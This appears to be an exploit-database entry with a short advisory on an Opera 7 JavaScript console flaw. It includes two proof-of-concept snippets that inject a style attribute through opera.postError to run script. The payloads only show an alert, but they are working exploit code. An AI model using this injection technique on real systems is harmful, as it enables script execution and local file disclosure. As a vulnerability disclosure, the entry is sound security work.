Opera 7.0 - JavaScript Console Attribute Injection

Author: GreyMagic Software
type: remote
platform: windows
port: 
date_added: 2003-02-04  
date_updated: 2012-10-24  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22213.txt  

source: https://www.securityfocus.com/bid/6755/info

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

open("file://localhost/console.html","","");
opera.postError("http://\"style=\"background-image:url('javascript:alert(location.href)')\"");

open("file://localhost/console.html","","");
opera.postError("file://\"style=\"background-image:url('javascript:alert(location.href)')\".");